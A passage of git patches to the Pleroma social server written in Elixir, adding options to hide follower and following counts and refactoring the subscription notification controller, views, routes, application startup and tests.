@@ -152,7 +156,7 @@ def render("following.json", %{user: user} = opts) do
"type" => "OrderedCollection",
"totalItems" => total,
"first" =>
- if showing do
+ if showing_items do
collection(following, "#{user.ap_id}/following", 1, !user.info.hide_follows)
else
"#{user.ap_id}/following?page=1"
@@ -162,32 +166,34 @@ def render("following.json", %{user: user} = opts) do
end
def render("followers.json", %{user: user, page: page} = opts) do
- showing = (opts[:for] && opts[:for] == user) || !user.info.hide_followers
+ showing_items = (opts[:for] && opts[:for] == user) || !user.info.hide_followers
+ showing_count = showing_items || !user.info.hide_followers_count
query = User.get_followers_query(user)
query = from(user in query, select: [:ap_id])
followers = Repo.all(query)
total =
- if showing do
+ if showing_count do
length(followers)
else
0
end
- collection(followers, "#{user.ap_id}/followers", page, showing, total)
+ collection(followers, "#{user.ap_id}/followers", page, showing_items, total)
|> Map.merge(Utils.make_json_ld_header())
end
def render("followers.json", %{user: user} = opts) do
- showing = (opts[:for] && opts[:for] == user) || !user.info.hide_followers
+ showing_items = (opts[:for] && opts[:for] == user) || !user.info.hide_followers
+ showing_count = showing_items || !user.info.hide_followers_count
query = User.get_followers_query(user)
query = from(user in query, select: [:ap_id])
followers = Repo.all(query)
total =
- if showing do
+ if showing_count do
length(followers)
else
0
@@ -198,8 +204,8 @@ def render("followers.json", %{user: user} = opts) do
"type" => "OrderedCollection",
"totalItems" => total,
"first" =>
- if showing do
- collection(followers, "#{user.ap_id}/followers", 1, showing, total)
+ if showing_items do
+ collection(followers, "#{user.ap_id}/followers", 1, showing_items, total)
else
"#{user.ap_id}/followers?page=1"
end
diff --git a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
index 060137b80..1beb4bcf2 100644
--- a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
+++ b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
@@ -147,6 +147,8 @@ def update_credentials(%{assigns: %{user: user}} = conn, params) do
[
:no_rich_text,
:locked,
+ :hide_followers_count,
+ :hide_follows_count,
:hide_followers,
:hide_follows,
:hide_favorites,
diff --git a/lib/pleroma/web/mastodon_api/views/account_view.ex b/lib/pleroma/web/mastodon_api/views/account_view.ex
index 169116d0d..195dd124b 100644
--- a/lib/pleroma/web/mastodon_api/views/account_view.ex
+++ b/lib/pleroma/web/mastodon_api/views/account_view.ex
@@ -74,10 +74,18 @@ defp do_render("account.json", %{user: user} = opts) do
user_info = User.get_cached_user_info(user)
following_count =
- ((!user.info.hide_follows or opts[:for] == user) && user_info.following_count) || 0
+ if !user.info.hide_follows_count or !user.info.hide_follows or opts[:for] == user do
+ user_info.following_count
+ else
+ 0
+ end
followers_count =
- ((!user.info.hide_followers or opts[:for] == user) && user_info.follower_count) || 0
+ if !user.info.hide_followers_count or !user.info.hide_followers or opts[:for] == user do
+ user_info.follower_count
+ else
+ 0
+ end
bot = (user.info.source_data["type"] || "Person") in ["Application", "Service"]
@@ -138,6 +146,8 @@ defp do_render("account.json", %{user: user} = opts) do
pleroma: %{
confirmation_pending: user_info.confirmation_pending,
tags: user.tags,
+ hide_followers_count: user.info.hide_followers_count,
+ hide_follows_count: user.info.hide_follows_count,
hide_followers: user.info.hide_followers,
hide_follows: user.info.hide_follows,
hide_favorites: user.info.hide_favorites,
diff --git a/test/web/activity_pub/views/user_view_test.exs b/test/web/activity_pub/views/user_view_test.exs
index fb7fd9e79..2b4a04afd 100644
--- a/test/web/activity_pub/views/user_view_test.exs
+++ b/test/web/activity_pub/views/user_view_test.exs
@@ -105,10 +105,20 @@ test "sets totalItems to zero when followers are hidden" do
other_user = insert(:user)
{:ok, _other_user, user, _activity} = CommonAPI.follow(other_user, user)
assert %{"totalItems" => 1} = UserView.render("followers.json", %{user: user})
- info = Map.put(user.info, :hide_followers, true)
+ info = Map.merge(user.info, %{hide_followers_count: true, hide_followers: true})
user = Map.put(user, :info, info)
assert %{"totalItems" => 0} = UserView.render("followers.json", %{user: user})
end
+
+ test "sets correct totalItems when followers are hidden but the follower counter is not" do
+ user = insert(:user)
+ other_user = insert(:user)
+ {:ok, _other_user, user, _activity} = CommonAPI.follow(other_user, user)
+ assert %{"totalItems" => 1} = UserView.render("followers.json", %{user: user})
+ info = Map.merge(user.info, %{hide_followers_count: false, hide_followers: true})
+ user = Map.put(user, :info, info)
+ assert %{"totalItems" => 1} = UserView.render("followers.json", %{user: user})
+ end
end
describe "following" do
@@ -117,9 +127,19 @@ test "sets totalItems to zero when follows are hidden" do
other_user = insert(:user)
{:ok, user, _other_user, _activity} = CommonAPI.follow(user, other_user)
assert %{"totalItems" => 1} = UserView.render("following.json", %{user: user})
- info = Map.put(user.info, :hide_follows, true)
+ info = Map.merge(user.info, %{hide_follows_count: true, hide_follows: true})
user = Map.put(user, :info, info)
assert %{"totalItems" => 0} = UserView.render("following.json", %{user: user})
end
+
+ test "sets correct totalItems when follows are hidden but the follow counter is not" do
+ user = insert(:user)
+ other_user = insert(:user)
+ {:ok, user, _other_user, _activity} = CommonAPI.follow(user, other_user)
+ assert %{"totalItems" => 1} = UserView.render("following.json", %{user: user})
+ info = Map.merge(user.info, %{hide_follows_count: false, hide_follows: true})
+ user = Map.put(user, :info, info)
+ assert %{"totalItems" => 1} = UserView.render("following.json", %{user: user})
+ end
end
end
diff --git a/test/web/mastodon_api/controllers/mastodon_api_controller/update_credentials_test.exs b/test/web/mastodon_api/controllers/mastodon_api_controller/update_credentials_test.exs
index 87ee82050..89d4ca37e 100644
--- a/test/web/mastodon_api/controllers/mastodon_api_controller/update_credentials_test.exs
+++ b/test/web/mastodon_api/controllers/mastodon_api_controller/update_credentials_test.exs
@@ -128,6 +128,22 @@ test "updates the user's hide_followers status", %{conn: conn} do
assert user["pleroma"]["hide_followers"] == true
end
+ test "updates the user's hide_followers_count and hide_follows_count", %{conn: conn} do
+ user = insert(:user)
+
+ conn =
+ conn
+ |> assign(:user, user)
+ |> patch("/api/v1/accounts/update_credentials", %{
+ hide_followers_count: "true",
+ hide_follows_count: "true"
+ })
+
+ assert user = json_response(conn, 200)
+ assert user["pleroma"]["hide_followers_count"] == true
+ assert user["pleroma"]["hide_follows_count"] == true
+ end
+
test "updates the user's skip_thread_containment option", %{conn: conn} do
user = insert(:user)
diff --git a/test/web/mastodon_api/views/account_view_test.exs b/test/web/mastodon_api/views/account_view_test.exs
index 1d8b28339..8ff6751d3 100644
--- a/test/web/mastodon_api/views/account_view_test.exs
+++ b/test/web/mastodon_api/views/account_view_test.exs
@@ -79,6 +79,8 @@ test "Represent a user account" do
hide_favorites: true,
hide_followers: false,
hide_follows: false,
+ hide_followers_count: false,
+ hide_follows_count: false,
relationship: %{},
skip_thread_containment: false
}
@@ -147,6 +149,8 @@ test "Represent a Service(bot) account" do
hide_favorites: true,
hide_followers: false,
hide_follows: false,
+ hide_followers_count: false,
+ hide_follows_count: false,
relationship: %{},
skip_thread_containment: false
}
@@ -318,6 +322,8 @@ test "represent an embedded relationship" do
hide_favorites: true,
hide_followers: false,
hide_follows: false,
+ hide_followers_count: false,
+ hide_follows_count: false,
relationship: %{
id: to_string(user.id),
following: false,
@@ -361,8 +367,16 @@ test "sanitizes display names" do
end
describe "hiding follows/following" do
- test "shows when follows/following are hidden and sets follower/following count to 0" do
- user = insert(:user, info: %{hide_followers: true, hide_follows: true})
+ test "shows when follows/followers stats are hidden and sets follow/follower count to 0" do
+ info = %{
+ hide_followers: true,
+ hide_followers_count: true,
+ hide_follows: true,
+ hide_follows_count: true
+ }
+
+ user = insert(:user, info: info)
+
other_user = insert(:user)
{:ok, user, other_user, _activity} = CommonAPI.follow(user, other_user)
{:ok, _other_user, user, _activity} = CommonAPI.follow(other_user, user)
@@ -370,6 +384,19 @@ test "shows when follows/following are hidden and sets follower/following count
assert %{
followers_count: 0,
following_count: 0,
+ pleroma: %{hide_follows_count: true, hide_followers_count: true}
+ } = AccountView.render("account.json", %{user: user})
+ end
+
+ test "shows when follows/followers are hidden" do
+ user = insert(:user, info: %{hide_followers: true, hide_follows: true})
+ other_user = insert(:user)
+ {:ok, user, other_user, _activity} = CommonAPI.follow(user, other_user)
+ {:ok, _other_user, user, _activity} = CommonAPI.follow(other_user, user)
+
+ assert %{
+ followers_count: 1,
+ following_count: 1,
pleroma: %{hide_follows: true, hide_followers: true}
} = AccountView.render("account.json", %{user: user})
end
From 2688b876abf5ebd48d18e460eee7db992f984f5a Mon Sep 17 00:00:00 2001
From: Roman Chvanikov
Date: Tue, 17 Sep 2019 13:42:28 +0000
Subject: [PATCH 088/272] Apply suggestion to
lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
---
.../web/pleroma_api/subscription_notification_controller.ex | 1 -
1 file changed, 1 deletion(-)
diff --git a/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex b/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
index bfc2631dd..d5da92946 100644
--- a/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
+++ b/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
@@ -9,7 +9,6 @@ defmodule Pleroma.Web.PleromaAPI.SubscriptionNotificationController do
alias Pleroma.SubscriptionNotification
alias Pleroma.Web.PleromaAPI.PleromaAPI
- alias Pleroma.Web.PleromaAPI.SubscriptionNotificationView
def list(%{assigns: %{user: user}} = conn, params) do
notifications = PleromaAPI.get_subscription_notifications(user, params)
From c0f776faecfa91ed755760975da12b546ca89317 Mon Sep 17 00:00:00 2001
From: Roman Chvanikov
Date: Tue, 17 Sep 2019 13:42:36 +0000
Subject: [PATCH 089/272] Apply suggestion to
lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
---
.../web/pleroma_api/subscription_notification_controller.ex | 1 -
1 file changed, 1 deletion(-)
diff --git a/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex b/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
index d5da92946..fff307b4e 100644
--- a/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
+++ b/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
@@ -15,7 +15,6 @@ def list(%{assigns: %{user: user}} = conn, params) do
conn
|> add_link_headers(notifications)
- |> put_view(SubscriptionNotificationView)
|> render("index.json", %{notifications: notifications, for: user})
end
From f9be517c7f3e63cfaaca871a4458cbf7c8a6a3f4 Mon Sep 17 00:00:00 2001
From: Roman Chvanikov
Date: Tue, 17 Sep 2019 13:42:40 +0000
Subject: [PATCH 090/272] Apply suggestion to
lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
---
.../web/pleroma_api/subscription_notification_controller.ex | 4 +---
1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex b/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
index fff307b4e..969ce0179 100644
--- a/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
+++ b/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
@@ -20,9 +20,7 @@ def list(%{assigns: %{user: user}} = conn, params) do
def get(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
with {:ok, notification} <- SubscriptionNotification.get(user, id) do
- conn
- |> put_view(SubscriptionNotificationView)
- |> render("show.json", %{subscription_notification: notification, for: user})
+ render(conn, "show.json", %{subscription_notification: notification, for: user})
else
{:error, reason} ->
conn
From a81f80233d63d98a0de7b57def76275182d5477e Mon Sep 17 00:00:00 2001
From: Roman Chvanikov
Date: Tue, 17 Sep 2019 13:43:10 +0000
Subject: [PATCH 091/272] Apply suggestion to lib/pleroma/web/router.ex
---
lib/pleroma/web/router.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 05891b6c0..1fff94b38 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -274,7 +274,7 @@ defmodule Pleroma.Web.Router do
post("/dismiss", SubscriptionNotificationController, :dismiss)
delete("/destroy_multiple", SubscriptionNotificationController, :destroy_multiple)
get("/", SubscriptionNotificationController, :list)
- get("/id", SubscriptionNotificationController, :get)
+ get("/:id", SubscriptionNotificationController, :get)
end
end
From 015597c2abbd9a78df76903bb2c3d229bf11e958 Mon Sep 17 00:00:00 2001
From: Roman Chvanikov
Date: Tue, 17 Sep 2019 13:43:15 +0000
Subject: [PATCH 092/272] Apply suggestion to
test/web/pleroma_api/subscription_notification_controller_test.exs
---
.../pleroma_api/subscription_notification_controller_test.exs | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/test/web/pleroma_api/subscription_notification_controller_test.exs b/test/web/pleroma_api/subscription_notification_controller_test.exs
index ee495f112..781d27ead 100644
--- a/test/web/pleroma_api/subscription_notification_controller_test.exs
+++ b/test/web/pleroma_api/subscription_notification_controller_test.exs
@@ -50,7 +50,7 @@ test "getting a single notification", %{conn: conn, user: user, subscriber: subs
{:ok, _activity} = CommonAPI.post(user, %{"status" => status_text})
[notification] = Repo.all(SubscriptionNotification)
- path = subscription_notification_path(conn, :get, id: notification.id)
+ path = subscription_notification_path(conn, :get, notification)
conn =
conn
From a76168e743c3dd193db6ebca029f287da9edd290 Mon Sep 17 00:00:00 2001
From: Roman Chvanikov
Date: Tue, 17 Sep 2019 16:44:41 +0300
Subject: [PATCH 093/272] Cleanup PleromaAPIController
---
.../web/pleroma_api/pleroma_api_controller.ex | 26 -------------------
1 file changed, 26 deletions(-)
diff --git a/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex b/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex
index 246b351dc..d17ccf84d 100644
--- a/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex
+++ b/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex
@@ -9,7 +9,6 @@ defmodule Pleroma.Web.PleromaAPI.PleromaAPIController do
alias Pleroma.Conversation.Participation
alias Pleroma.Notification
- alias Pleroma.SubscriptionNotification
alias Pleroma.Web.ActivityPub.ActivityPub
alias Pleroma.Web.MastodonAPI.ConversationView
alias Pleroma.Web.MastodonAPI.NotificationView
@@ -87,29 +86,4 @@ def read_notification(%{assigns: %{user: user}} = conn, %{"max_id" => max_id}) d
|> render("index.json", %{notifications: notifications, for: user})
end
end
-
- def delete_subscription_notification(%{assigns: %{user: user}} = conn, %{
- "id" => notification_id
- }) do
- with {:ok, notification} <- SubscriptionNotification.dismiss(user, notification_id) do
- conn
- |> put_view(NotificationView)
- |> render("show.json", %{notification: notification, for: user})
- else
- {:error, message} ->
- conn
- |> put_status(:bad_request)
- |> json(%{"error" => message})
- end
- end
-
- def read_subscription_notification(%{assigns: %{user: user}} = conn, %{"max_id" => max_id}) do
- with notifications <- SubscriptionNotification.clear_up_to(user, max_id) do
- notifications = Enum.take(notifications, 80)
-
- conn
- |> put_view(NotificationView)
- |> render("index.json", %{notifications: notifications, for: user})
- end
- end
end
From 7d1773bc6b01caad8666ef07a9b2f2ac326fd0cd Mon Sep 17 00:00:00 2001
From: Roman Chvanikov
Date: Tue, 17 Sep 2019 16:48:24 +0300
Subject: [PATCH 094/272] Rename SubscriptionNotificationController list and
get actions to index and show
---
.../subscription_notification_controller.ex | 4 ++--
lib/pleroma/web/router.ex | 4 ++--
...bscription_notification_controller_test.exs | 18 +++++++++---------
3 files changed, 13 insertions(+), 13 deletions(-)
diff --git a/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex b/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
index 969ce0179..fa8307668 100644
--- a/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
+++ b/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
@@ -10,7 +10,7 @@ defmodule Pleroma.Web.PleromaAPI.SubscriptionNotificationController do
alias Pleroma.SubscriptionNotification
alias Pleroma.Web.PleromaAPI.PleromaAPI
- def list(%{assigns: %{user: user}} = conn, params) do
+ def index(%{assigns: %{user: user}} = conn, params) do
notifications = PleromaAPI.get_subscription_notifications(user, params)
conn
@@ -18,7 +18,7 @@ def list(%{assigns: %{user: user}} = conn, params) do
|> render("index.json", %{notifications: notifications, for: user})
end
- def get(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
+ def show(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
with {:ok, notification} <- SubscriptionNotification.get(user, id) do
render(conn, "show.json", %{subscription_notification: notification, for: user})
else
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index 1fff94b38..502c67e74 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -273,8 +273,8 @@ defmodule Pleroma.Web.Router do
post("/clear", SubscriptionNotificationController, :clear)
post("/dismiss", SubscriptionNotificationController, :dismiss)
delete("/destroy_multiple", SubscriptionNotificationController, :destroy_multiple)
- get("/", SubscriptionNotificationController, :list)
- get("/:id", SubscriptionNotificationController, :get)
+ get("/", SubscriptionNotificationController, :index)
+ get("/:id", SubscriptionNotificationController, :show)
end
end
diff --git a/test/web/pleroma_api/subscription_notification_controller_test.exs b/test/web/pleroma_api/subscription_notification_controller_test.exs
index 781d27ead..c6a71732d 100644
--- a/test/web/pleroma_api/subscription_notification_controller_test.exs
+++ b/test/web/pleroma_api/subscription_notification_controller_test.exs
@@ -33,7 +33,7 @@ defmodule Pleroma.Web.PleromaAPI.SubscriptionNotificationControllerTest do
test "list of notifications", %{conn: conn, user: user, subscriber: subscriber} do
status_text = "Hello"
{:ok, _activity} = CommonAPI.post(user, %{"status" => status_text})
- path = subscription_notification_path(conn, :list)
+ path = subscription_notification_path(conn, :index)
conn =
conn
@@ -50,7 +50,7 @@ test "getting a single notification", %{conn: conn, user: user, subscriber: subs
{:ok, _activity} = CommonAPI.post(user, %{"status" => status_text})
[notification] = Repo.all(SubscriptionNotification)
- path = subscription_notification_path(conn, :get, notification)
+ path = subscription_notification_path(conn, :show, notification)
conn =
conn
@@ -101,7 +101,7 @@ test "clearing all notifications also deletes them", %{
conn =
build_conn()
|> assign(:user, subscriber)
- |> get(subscription_notification_path(conn, :list))
+ |> get(subscription_notification_path(conn, :index))
assert json_response(conn, 200) == []
@@ -136,7 +136,7 @@ test "paginates notifications using min_id, since_id, max_id, and limit", %{
conn_res =
get(
conn,
- subscription_notification_path(conn, :list, %{
+ subscription_notification_path(conn, :index, %{
"limit" => 2,
"min_id" => notification1_id
})
@@ -149,7 +149,7 @@ test "paginates notifications using min_id, since_id, max_id, and limit", %{
conn_res =
get(
conn,
- subscription_notification_path(conn, :list, %{
+ subscription_notification_path(conn, :index, %{
"limit" => 2,
"since_id" => notification1_id
})
@@ -162,7 +162,7 @@ test "paginates notifications using min_id, since_id, max_id, and limit", %{
conn_res =
get(
conn,
- subscription_notification_path(conn, :list, %{
+ subscription_notification_path(conn, :index, %{
"limit" => 2,
"max_id" => notification4_id
})
@@ -195,7 +195,7 @@ test "destroy multiple", %{conn: conn, user: user1, subscriber: user2} do
conn = assign(conn, :user, user1)
- conn_res = get(conn, subscription_notification_path(conn, :list))
+ conn_res = get(conn, subscription_notification_path(conn, :index))
result = json_response(conn_res, 200)
@@ -205,7 +205,7 @@ test "destroy multiple", %{conn: conn, user: user1, subscriber: user2} do
conn2 = assign(conn, :user, user2)
- conn_res = get(conn2, subscription_notification_path(conn, :list))
+ conn_res = get(conn2, subscription_notification_path(conn, :index))
result = json_response(conn_res, 200)
@@ -220,7 +220,7 @@ test "destroy multiple", %{conn: conn, user: user1, subscriber: user2} do
assert json_response(conn_destroy, 200) == %{}
- conn_res = get(conn2, subscription_notification_path(conn, :list))
+ conn_res = get(conn2, subscription_notification_path(conn, :index))
result = json_response(conn_res, 200)
From e9f69a3eb7f17ae8c2890972851de1139983ce3d Mon Sep 17 00:00:00 2001
From: Roman Chvanikov
Date: Tue, 17 Sep 2019 16:52:23 +0300
Subject: [PATCH 095/272] Move pleroma_api controllers into controllers
sub-folders
---
.../web/pleroma_api/{ => controllers}/pleroma_api_controller.ex | 0
.../{ => controllers}/subscription_notification_controller.ex | 0
.../pleroma_api/{ => controllers}/pleroma_api_controller_test.exs | 0
.../subscription_notification_controller_test.exs | 0
4 files changed, 0 insertions(+), 0 deletions(-)
rename lib/pleroma/web/pleroma_api/{ => controllers}/pleroma_api_controller.ex (100%)
rename lib/pleroma/web/pleroma_api/{ => controllers}/subscription_notification_controller.ex (100%)
rename test/web/pleroma_api/{ => controllers}/pleroma_api_controller_test.exs (100%)
rename test/web/pleroma_api/{ => controllers}/subscription_notification_controller_test.exs (100%)
diff --git a/lib/pleroma/web/pleroma_api/pleroma_api_controller.ex b/lib/pleroma/web/pleroma_api/controllers/pleroma_api_controller.ex
similarity index 100%
rename from lib/pleroma/web/pleroma_api/pleroma_api_controller.ex
rename to lib/pleroma/web/pleroma_api/controllers/pleroma_api_controller.ex
diff --git a/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex b/lib/pleroma/web/pleroma_api/controllers/subscription_notification_controller.ex
similarity index 100%
rename from lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
rename to lib/pleroma/web/pleroma_api/controllers/subscription_notification_controller.ex
diff --git a/test/web/pleroma_api/pleroma_api_controller_test.exs b/test/web/pleroma_api/controllers/pleroma_api_controller_test.exs
similarity index 100%
rename from test/web/pleroma_api/pleroma_api_controller_test.exs
rename to test/web/pleroma_api/controllers/pleroma_api_controller_test.exs
diff --git a/test/web/pleroma_api/subscription_notification_controller_test.exs b/test/web/pleroma_api/controllers/subscription_notification_controller_test.exs
similarity index 100%
rename from test/web/pleroma_api/subscription_notification_controller_test.exs
rename to test/web/pleroma_api/controllers/subscription_notification_controller_test.exs
From 9fa2586abd915342095574f05358642412db0f04 Mon Sep 17 00:00:00 2001
From: Roman Chvanikov
Date: Tue, 17 Sep 2019 17:44:10 +0300
Subject: [PATCH 096/272] Refactor SubscriptionNotificationView
---
.../subscription_notification_controller.ex | 20 +++++++++++++++++--
.../views/subscription_notification_view.ex | 9 +++++----
2 files changed, 23 insertions(+), 6 deletions(-)
diff --git a/lib/pleroma/web/pleroma_api/controllers/subscription_notification_controller.ex b/lib/pleroma/web/pleroma_api/controllers/subscription_notification_controller.ex
index fa8307668..37c2222de 100644
--- a/lib/pleroma/web/pleroma_api/controllers/subscription_notification_controller.ex
+++ b/lib/pleroma/web/pleroma_api/controllers/subscription_notification_controller.ex
@@ -7,11 +7,16 @@ defmodule Pleroma.Web.PleromaAPI.SubscriptionNotificationController do
import Pleroma.Web.ControllerHelper, only: [add_link_headers: 2]
+ alias Pleroma.Activity
alias Pleroma.SubscriptionNotification
+ alias Pleroma.User
alias Pleroma.Web.PleromaAPI.PleromaAPI
def index(%{assigns: %{user: user}} = conn, params) do
- notifications = PleromaAPI.get_subscription_notifications(user, params)
+ notifications =
+ user
+ |> PleromaAPI.get_subscription_notifications(params)
+ |> Enum.map(&build_notification_data/1)
conn
|> add_link_headers(notifications)
@@ -20,7 +25,10 @@ def index(%{assigns: %{user: user}} = conn, params) do
def show(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
with {:ok, notification} <- SubscriptionNotification.get(user, id) do
- render(conn, "show.json", %{subscription_notification: notification, for: user})
+ render(conn, "show.json", %{
+ subscription_notification: build_notification_data(notification),
+ for: user
+ })
else
{:error, reason} ->
conn
@@ -52,4 +60,12 @@ def destroy_multiple(
SubscriptionNotification.destroy_multiple(user, ids)
json(conn, %{})
end
+
+ defp build_notification_data(%{activity: %{data: data}} = notification) do
+ %{
+ notification: notification,
+ actor: User.get_cached_by_ap_id(data["actor"]),
+ parent_activity: Activity.get_create_by_object_ap_id(data["object"])
+ }
+ end
end
diff --git a/lib/pleroma/web/pleroma_api/views/subscription_notification_view.ex b/lib/pleroma/web/pleroma_api/views/subscription_notification_view.ex
index d7f7f4c5a..0eccbcbb9 100644
--- a/lib/pleroma/web/pleroma_api/views/subscription_notification_view.ex
+++ b/lib/pleroma/web/pleroma_api/views/subscription_notification_view.ex
@@ -6,7 +6,6 @@ defmodule Pleroma.Web.PleromaAPI.SubscriptionNotificationView do
use Pleroma.Web, :view
alias Pleroma.Activity
- alias Pleroma.User
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.MastodonAPI.AccountView
alias Pleroma.Web.MastodonAPI.StatusView
@@ -17,11 +16,13 @@ def render("index.json", %{notifications: notifications, for: user}) do
end
def render("show.json", %{
- subscription_notification: %{activity: activity} = notification,
+ subscription_notification: %{
+ notification: %{activity: activity} = notification,
+ actor: actor,
+ parent_activity: parent_activity
+ },
for: user
}) do
- actor = User.get_cached_by_ap_id(activity.data["actor"])
- parent_activity = Activity.get_create_by_object_ap_id(activity.data["object"])
mastodon_type = Activity.mastodon_notification_type(activity)
response = %{
From 80c5c3495bdd7939e576c8746a959f3f89f44042 Mon Sep 17 00:00:00 2001
From: Steven Fuchs
Date: Tue, 17 Sep 2019 14:44:52 +0000
Subject: [PATCH 097/272] remove remaining errors from tests
---
lib/pleroma/application.ex | 53 ++++++++++++++------
lib/pleroma/web/streamer/state.ex | 18 +++++--
test/integration/mastodon_websocket_test.exs | 16 ++++--
3 files changed, 62 insertions(+), 25 deletions(-)
diff --git a/lib/pleroma/application.ex b/lib/pleroma/application.ex
index 3b37ce630..dabce771d 100644
--- a/lib/pleroma/application.ex
+++ b/lib/pleroma/application.ex
@@ -43,23 +43,9 @@ def start(_type, _args) do
hackney_pool_children() ++
[
Pleroma.Stats,
- {Oban, Pleroma.Config.get(Oban)},
- %{
- id: :web_push_init,
- start: {Task, :start_link, [&Pleroma.Web.Push.init/0]},
- restart: :temporary
- },
- %{
- id: :federator_init,
- start: {Task, :start_link, [&Pleroma.Web.Federator.init/0]},
- restart: :temporary
- },
- %{
- id: :internal_fetch_init,
- start: {Task, :start_link, [&Pleroma.Web.ActivityPub.InternalFetchActor.init/0]},
- restart: :temporary
- }
+ {Oban, Pleroma.Config.get(Oban)}
] ++
+ task_children(@env) ++
oauth_cleanup_child(oauth_cleanup_enabled?()) ++
streamer_child(@env) ++
chat_child(@env, chat_enabled?()) ++
@@ -163,4 +149,39 @@ defp hackney_pool_children do
:hackney_pool.child_spec(pool, options)
end
end
+
+ defp task_children(:test) do
+ [
+ %{
+ id: :web_push_init,
+ start: {Task, :start_link, [&Pleroma.Web.Push.init/0]},
+ restart: :temporary
+ },
+ %{
+ id: :federator_init,
+ start: {Task, :start_link, [&Pleroma.Web.Federator.init/0]},
+ restart: :temporary
+ }
+ ]
+ end
+
+ defp task_children(_) do
+ [
+ %{
+ id: :web_push_init,
+ start: {Task, :start_link, [&Pleroma.Web.Push.init/0]},
+ restart: :temporary
+ },
+ %{
+ id: :federator_init,
+ start: {Task, :start_link, [&Pleroma.Web.Federator.init/0]},
+ restart: :temporary
+ },
+ %{
+ id: :internal_fetch_init,
+ start: {Task, :start_link, [&Pleroma.Web.ActivityPub.InternalFetchActor.init/0]},
+ restart: :temporary
+ }
+ ]
+ end
end
diff --git a/lib/pleroma/web/streamer/state.ex b/lib/pleroma/web/streamer/state.ex
index 7b5199068..c48752d95 100644
--- a/lib/pleroma/web/streamer/state.ex
+++ b/lib/pleroma/web/streamer/state.ex
@@ -4,16 +4,18 @@ defmodule Pleroma.Web.Streamer.State do
alias Pleroma.Web.Streamer.StreamerSocket
+ @env Mix.env()
+
def start_link(_) do
GenServer.start_link(__MODULE__, %{sockets: %{}}, name: __MODULE__)
end
def add_socket(topic, socket) do
- GenServer.call(__MODULE__, {:add, socket, topic})
+ GenServer.call(__MODULE__, {:add, topic, socket})
end
def remove_socket(topic, socket) do
- GenServer.call(__MODULE__, {:remove, socket, topic})
+ do_remove_socket(@env, topic, socket)
end
def get_sockets do
@@ -29,7 +31,7 @@ def handle_call(:get_state, _from, state) do
{:reply, state, state}
end
- def handle_call({:add, socket, topic}, _from, %{sockets: sockets} = state) do
+ def handle_call({:add, topic, socket}, _from, %{sockets: sockets} = state) do
internal_topic = internal_topic(topic, socket)
stream_socket = StreamerSocket.from_socket(socket)
@@ -44,7 +46,7 @@ def handle_call({:add, socket, topic}, _from, %{sockets: sockets} = state) do
{:reply, state, state}
end
- def handle_call({:remove, socket, topic}, _from, %{sockets: sockets} = state) do
+ def handle_call({:remove, topic, socket}, _from, %{sockets: sockets} = state) do
internal_topic = internal_topic(topic, socket)
stream_socket = StreamerSocket.from_socket(socket)
@@ -57,6 +59,14 @@ def handle_call({:remove, socket, topic}, _from, %{sockets: sockets} = state) do
{:reply, state, state}
end
+ defp do_remove_socket(:test, _, _) do
+ :ok
+ end
+
+ defp do_remove_socket(_env, topic, socket) do
+ GenServer.call(__MODULE__, {:remove, topic, socket})
+ end
+
defp internal_topic(topic, socket)
when topic in ~w[user user:notification direct] do
"#{topic}:#{socket.assigns[:user].id}"
diff --git a/test/integration/mastodon_websocket_test.exs b/test/integration/mastodon_websocket_test.exs
index c04262808..d02a3cc4d 100644
--- a/test/integration/mastodon_websocket_test.exs
+++ b/test/integration/mastodon_websocket_test.exs
@@ -18,6 +18,11 @@ defmodule Pleroma.Integration.MastodonWebsocketTest do
|> Map.put(:path, "/api/v1/streaming")
|> URI.to_string()
+ setup_all do
+ start_supervised(Pleroma.Web.Streamer.supervisor())
+ :ok
+ end
+
def start_socket(qs \\ nil, headers \\ []) do
path =
case qs do
@@ -32,6 +37,7 @@ test "refuses invalid requests" do
capture_log(fn ->
assert {:error, {400, _}} = start_socket()
assert {:error, {404, _}} = start_socket("?stream=ncjdk")
+ Process.sleep(30)
end)
end
@@ -39,17 +45,16 @@ test "requires authentication and a valid token for protected streams" do
capture_log(fn ->
assert {:error, {403, _}} = start_socket("?stream=user&access_token=aaaaaaaaaaaa")
assert {:error, {403, _}} = start_socket("?stream=user")
